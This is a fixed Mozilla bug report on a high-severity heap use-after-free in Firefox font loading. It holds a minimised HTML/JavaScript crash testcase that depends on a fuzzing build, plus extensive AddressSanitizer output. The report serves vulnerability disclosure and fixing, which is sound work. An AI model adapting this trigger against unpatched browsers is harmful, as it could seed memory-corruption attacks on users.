Closed Bug 1559093 Opened 5 years ago Closed 5 years ago

heap-use-after-free in gfxUserFontEntry::LoadPlatformFont

Categories

(Core :: CSS Parsing and Computation, defect)

Product:
Core
Component:
CSS Parsing and Computation
Version:
69 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
VERIFIED FIXED
Milestone:
mozilla69
Tracking Flags:
Tracking Status
firefox-esr60 --- unaffected
firefox67 --- unaffected
firefox68 --- unaffected
firefox69 + verified
firefox70 --- verified

People

(Reporter: nils, Assigned: heycam)

References

(Regression)

Details

(Keywords: csectype-uaf, regression, sec-high, Whiteboard: [post-critsmash-triage])

Attachments

(4 files)

crash.html (minimised testcase)
657 bytes, text/html
Details
ASAN output
37.39 KB, text/plain
Details
Junction-webfont.eot
21.79 KB, application/vnd.ms-fontobject
Details
Bug 1559093 - Handle font load cancellation better.
47 bytes, text/x-phabricator-request
Details | Review

The following testcase crashes the latest ASAN build of Firefox 69.0a1 (SourceStamp=4a63f0a3a1f26e2a377ffbd477ba050e16577445). It requires a fuzzing build (--enable-fuzzing) and the pref user_pref("fuzzing.enabled",true). I am using a Python2 webserver (python -m SimpleHTTPServer) to host the testcase. It also requires the attached font file.

crash.html:
<script>
function spin() {
    var x=new XMLHttpRequest();
    x.open("POST","/post",false);
    try{x.send("X");}catch(e){}
}
function start() {
	o104=document.createElement('iframe');
	document.documentElement.appendChild(o104);
	o444=window.top.frames[0];
	o444.eval("window.top.o668=new FontFace('font7',unescape('url%28%27Junction-webfont.eot%27%29'));");
    o668.load();
    spin();
    window.top.setTimeout("window.top.location.href='crash.html'",400);
    o668=null;
    FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();FuzzingFunctions.garbageCollect();FuzzingFunctions.cycleCollect();
}
</script>
<body onload="start()"></body>

ASAN output:
=================================================================
==23262==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800007b520 at pc 0x7fc8b6409910 bp 0x7fff52913cb0 sp 0x7fff52913ca8
READ of size 8 at 0x60800007b520 thread T0 (Web Content)
    #0 0x7fc8b640990f in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15
    #1 0x7fc8b640a8bc in gfxUserFontEntry::ContinuePlatformFontLoadOnMainThread(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:946:17
    #2 0x7fc8b643879f in applyImpl<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByConstLRef<gfxUserFontType>, StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByRRef<nsTArray<nsTString<char> > >, StoreCopyPassByConstLRef<nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> > , 0, 1, 2, 3, 4, 5, 6> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
    #3 0x7fc8b643879f in apply<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
    #4 0x7fc8b643879f in mozilla::detail::RunnableMethodImpl<gfxUserFontEntry*, void (gfxUserFontEntry::*)(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), true, (mozilla::RunnableKind)0, unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> >::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
    #5 0x7fc8b274bff3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1215:14
    #6 0x7fc8b2753db4 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #7 0x7fc8b3b4e32f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #8 0x7fc8b3a2562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #9 0x7fc8b3a2562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #10 0x7fc8b3a2562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #11 0x7fc8bd1260d3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #12 0x7fc8c17673de in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #13 0x7fc8b3a2562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fc8b3a2562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fc8b3a2562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fc8c1765f21 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #17 0x5569d2353eb3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #18 0x5569d2353eb3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #19 0x7fc8d76bcb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #20 0x5569d22753ec in _start (/home/nils/browser/firefox/firefox/firefox+0x453ec)

0x60800007b520 is located 0 bytes inside of 88-byte region [0x60800007b520,0x60800007b578)
freed by thread T0 (Web Content) here:
    #0 0x5569d2320a82 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fc8b2513ca4 in nsCycleCollector::CollectWhite() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3090:26
    #2 0x7fc8b25181b4 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3436:24
    #3 0x7fc8b251d19c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3949:21
    #4 0x7fc8b7038cdb in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1432:3
    #5 0x7fc8b9a7c1de in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #6 0x7fc8c1a3e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #7 0x7fc8c1a3e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #8 0x7fc8c1a1f238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #9 0x7fc8c1a1f238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #10 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #11 0x7fc8c1a3f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #12 0x7fc8c1a41462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #13 0x7fc8c26bf548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
JavaScript error: http://localhost:8000/crash.html, line 5: NetworkError: A network error occurred.
    #14 0x7fc8b9760429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #15 0x7fc8baa524ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #16 0x7fc8baa524ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #17 0x7fc8baa01cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #18 0x7fc8baa03ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #19 0x7fc8ba9e4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #20 0x7fc8ba9e4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #21 0x7fc8ba9e2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #22 0x7fc8ba9e96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #23 0x7fc8bd9d6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #24 0x7fc8c0871053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #25 0x7fc8c087016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #26 0x7fc8c0875b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #27 0x7fc8b5333c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3
    #28 0x7fc8b533282a in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:896:14
    #29 0x7fc8b532ce70 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #30 0x7fc8b53306e5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:618:5
    #31 0x7fc8b5332374 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp
    #32 0x7fc8b2a85311 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:568:22
    #33 0x7fc8b6c0cbb8 in DoUnblockOnload /builds/worker/workspace/build/src/dom/base/Document.cpp:10534:18
    #34 0x7fc8b6c0cbb8 in mozilla::dom::Document::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/Document.cpp:10466

previously allocated by thread T0 (Web Content) here:
    #0 0x5569d2320e03 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5569d2355b6d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fc8bd66e925 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:144:10
    #3 0x7fc8bd66e925 in mozilla::dom::FontFaceSet::FontFaceSet(nsPIDOMWindowInner*, mozilla::dom::Document*) /builds/worker/workspace/build/src/layout/style/FontFaceSet.cpp:165
    #4 0x7fc8b6c884e6 in mozilla::dom::Document::Fonts() /builds/worker/workspace/build/src/dom/base/Document.cpp:14613:24
    #5 0x7fc8bd661bef in mozilla::dom::FontFace::Constructor(mozilla::dom::GlobalObject const&, nsTSubstring<char16_t> const&, mozilla::dom::StringOrArrayBufferOrArrayBufferView const&, mozilla::dom::FontFaceDescriptors const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/FontFace.cpp:168:52
    #6 0x7fc8b9a1ae3b in mozilla::dom::FontFace_Binding::_constructor(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FontFaceBinding.cpp:1764:54
    #7 0x7fc8c1a4240d in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #8 0x7fc8c1a4240d in CallJSNativeConstructor /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:464
    #9 0x7fc8c1a4240d in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:657
    #10 0x7fc8c1a1f0fd in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3078:16
    #11 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #12 0x7fc8c1a44fcc in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:787:13
    #13 0x7fc8c1b405f1 in EvalKernel(JSContext*, JS::Handle<JS::Value>, EvalType, js::AbstractFramePtr, JS::Handle<JSObject*>, unsigned char*, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:326:10
    #14 0x7fc8c1b3fbd8 in js::IndirectEval(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Eval.cpp:424:10
    #15 0x7fc8c1a3e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #16 0x7fc8c1a3e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #17 0x7fc8c1a1f238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #18 0x7fc8c1a1f238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #19 0x7fc8c1a0964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #20 0x7fc8c1a3f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #21 0x7fc8c1a41462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #22 0x7fc8c26bf548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
    #23 0x7fc8b9760429 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle<JS::Value>, mozilla::dom::Event&, JS::MutableHandle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:267:37
    #24 0x7fc8baa524ac in Call<nsCOMPtr<mozilla::dom::EventTarget> > /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:363:12
    #25 0x7fc8baa524ac in mozilla::JSEventHandler::HandleEvent(mozilla::dom::Event*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:205
    #26 0x7fc8baa01cba in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, mozilla::dom::Event*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1028:22
    #27 0x7fc8baa03ad3 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event**, mozilla::dom::EventTarget*, nsEventStatus*, bool) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1220:17
    #28 0x7fc8ba9e4741 in HandleEvent /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/EventListenerManager.h:353:5
    #29 0x7fc8ba9e4741 in mozilla::EventTargetChainItem::HandleEvent(mozilla::EventChainPostVisitor&, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:349
    #30 0x7fc8ba9e2976 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray<mozilla::EventTargetChainItem>&, mozilla::EventChainPostVisitor&, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:551:16
    #31 0x7fc8ba9e96e4 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray<mozilla::dom::EventTarget*>*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:1047:11
    #32 0x7fc8bd9d6cc8 in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1154:7
    #33 0x7fc8c0871053 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6680:20
    #34 0x7fc8c087016c in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6480:7
    #35 0x7fc8c0875b77 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp
    #36 0x7fc8b5333c35 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1337:3

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15 in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&)
Shadow bytes around the buggy address:
  0x0c1080007650: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007660: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1080007670: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1080007680: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1080007690: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c10800076a0: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c10800076c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c10800076d0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c10800076f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==23262==ABORTING
[Parent 22906, Gecko_IOThread] WARNING: pipe error (113): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358
=================================================================
==23329==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000078220 at pc 0x7f480dfd9910 bp 0x7ffd5a7e8f30 sp 0x7ffd5a7e8f28
READ of size 8 at 0x608000078220 thread T0 (Web Content)
    #0 0x7f480dfd990f in gfxUserFontEntry::LoadPlatformFont(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:740:15
    #1 0x7f480dfda8bc in gfxUserFontEntry::ContinuePlatformFontLoadOnMainThread(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>) /builds/worker/workspace/build/src/gfx/thebes/gfxUserFontSet.cpp:946:17
    #2 0x7f480e00879f in applyImpl<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByConstLRef<gfxUserFontType>, StoreConstPtrPassByConstPtr<unsigned char>, StoreCopyPassByConstLRef<unsigned int>, StoreCopyPassByRRef<nsTArray<nsTString<char> > >, StoreCopyPassByConstLRef<nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> > , 0, 1, 2, 3, 4, 5, 6> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1124:12
    #3 0x7f480e00879f in apply<gfxUserFontEntry, void (gfxUserFontEntry::*)(const unsigned char *, unsigned int, gfxUserFontType, const unsigned char *, unsigned int, nsTArray<nsTString<char> > &&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>)> /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1130
    #4 0x7f480e00879f in mozilla::detail::RunnableMethodImpl<gfxUserFontEntry*, void (gfxUserFontEntry::*)(unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback>), true, (mozilla::RunnableKind)0, unsigned char const*, unsigned int, gfxUserFontType, unsigned char const*, unsigned int, nsTArray<nsTString<char> >&&, nsMainThreadPtrHandle<nsIFontLoadCompleteCallback> >::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1176
    #5 0x7f480a31bff3 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1215:14
    #6 0x7f480a323db4 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #7 0x7f480b71e32f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #8 0x7f480b5f562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #9 0x7f480b5f562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #10 0x7f480b5f562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #11 0x7f4814cf60d3 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #12 0x7f48193373de in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #13 0x7f480b5f562e in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7f480b5f562e in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7f480b5f562e in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7f4819335f21 in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #17 0x564c92eadeb3 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #18 0x564c92eadeb3 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #19 0x7f482f1e4b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #20 0x564c92dcf3ec in _start (/home/nils/browser/firefox/firefox/firefox+0x453ec)

0x608000078220 is located 0 bytes inside of 88-byte region [0x608000078220,0x608000078278)
freed by thread T0 (Web Content) here:
    #0 0x564c92e7aa82 in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7f480a0e3ca4 in nsCycleCollector::CollectWhite() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3090:26
    #2 0x7f480a0e81b4 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3436:24
    #3 0x7f480a0ed19c in nsCycleCollector_collect(nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3949:21
    #4 0x7f480ec08cdb in nsJSContext::CycleCollectNow(nsICycleCollectorListener*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1432:3
    #5 0x7f481164c1de in mozilla::dom::FuzzingFunctions_Binding::cycleCollect(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/FuzzingFunctionsBinding.cpp:66:3
    #6 0x7f481960e7c5 in CallJSNative /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448:13
    #7 0x7f481960e7c5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:540
    #8 0x7f48195ef238 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:599:10
    #9 0x7f48195ef238 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3087
    #10 0x7f48195d964e in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:425:10
    #11 0x7f481960f018 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:568:13
    #12 0x7f4819611462 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:611:8
    #13 0x7f481a28f548 in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2655:10
